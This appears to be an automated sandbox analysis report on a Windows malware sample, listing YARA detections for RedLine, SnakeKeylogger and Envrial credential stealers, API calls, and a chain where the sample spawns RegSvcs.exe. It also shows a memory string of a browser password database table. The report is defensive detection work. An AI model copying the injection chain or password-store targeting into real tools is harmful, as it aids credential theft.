Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_02B112B2	4_2_02B112B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_02B112C0	4_2_02B112C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_02B11560	4_2_02B11560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_02B1154F	4_2_02B1154F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06981A88	4_2_06981A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06988670	4_2_06988670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06981388	4_2_06981388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06980C90	4_2_06980C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06980040	4_2_06980040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06989198	4_2_06989198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06984150	4_2_06984150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698CED0	4_2_0698CED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698CECA	4_2_0698CECA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698C610	4_2_0698C610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698FA30	4_2_0698FA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698C620	4_2_0698C620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698FA40	4_2_0698FA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698CA78	4_2_0698CA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06981A78	4_2_06981A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698CA68	4_2_0698CA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698D780	4_2_0698D780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698DBD8	4_2_0698DBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698DBC8	4_2_0698DBC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698D319	4_2_0698D319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698D328	4_2_0698D328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06981378	4_2_06981378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698D770	4_2_0698D770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698E488	4_2_0698E488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06980C85	4_2_06980C85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06987CB8	4_2_06987CB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698E8D0	4_2_0698E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06987CC8	4_2_06987CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698E8E0	4_2_0698E8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06980006	4_2_06980006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698E030	4_2_0698E030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698E020	4_2_0698E020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06988450	4_2_06988450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06980C51	4_2_06980C51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698E478	4_2_0698E478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698F190	4_2_0698F190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06989188	4_2_06989188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698F181	4_2_0698F181
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698C1B9	4_2_0698C1B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698F5D8	4_2_0698F5D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698C1C8	4_2_0698C1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698F5E8	4_2_0698F5E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698ED38	4_2_0698ED38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698ED29	4_2_0698ED29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_06984140	4_2_06984140

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: String function: 00608900 appears 42 times
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: String function: 005E7DE1 appears 36 times
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: String function: 00600AE3 appears 70 times

Source: C5JLkBS1CX.exe, 00000000.00000002.2153263594.0000000000EF0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs C5JLkBS1CX.exe
Source: C5JLkBS1CX.exe, 00000000.00000003.2152153124.0000000003AAD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs C5JLkBS1CX.exe
Source: C5JLkBS1CX.exe, 00000000.00000003.2151640164.0000000003903000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs C5JLkBS1CX.exe
Source: C5JLkBS1CX.exe, 00000003.00000003.2183478237.0000000003AAD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs C5JLkBS1CX.exe
Source: C5JLkBS1CX.exe, 00000003.00000003.2181927060.00000000038B3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs C5JLkBS1CX.exe
Source: C5JLkBS1CX.exe, 00000003.00000002.2185993029.0000000003750000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs C5JLkBS1CX.exe

Source: C5JLkBS1CX.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.C5JLkBS1CX.exe.3750000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.C5JLkBS1CX.exe.ef0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.4580969067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.2153263594.0000000000EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.2185993029.0000000003750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 1708, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@4/4

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_0064A06A GetLastError,FormatMessageW,

0_2_0064A06A

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_006381CB AdjustTokenPrivileges,CloseHandle,		0_2_006381CB
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_006387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_006387E1

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_0064B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0064B333

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_0065EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0065EE0D

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_006583BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_006583BB

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_005E4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_005E4E89

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

File created: C:\Users\user\AppData\Local\Temp\autBA82.tmp

Jump to behavior

Source: C5JLkBS1CX.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000003196000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000003153000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000003162000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C5JLkBS1CX.exe	ReversingLabs: Detection: 91%
Source: C5JLkBS1CX.exe	Virustotal: Detection: 66%

Source: unknown	Process created: C:\Users\user\Desktop\C5JLkBS1CX.exe "C:\Users\user\Desktop\C5JLkBS1CX.exe"
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\C5JLkBS1CX.exe"
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process created: C:\Users\user\Desktop\C5JLkBS1CX.exe "C:\Users\user\Desktop\C5JLkBS1CX.exe"
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\C5JLkBS1CX.exe"
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\C5JLkBS1CX.exe"	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process created: C:\Users\user\Desktop\C5JLkBS1CX.exe "C:\Users\user\Desktop\C5JLkBS1CX.exe"	Jump to behavior
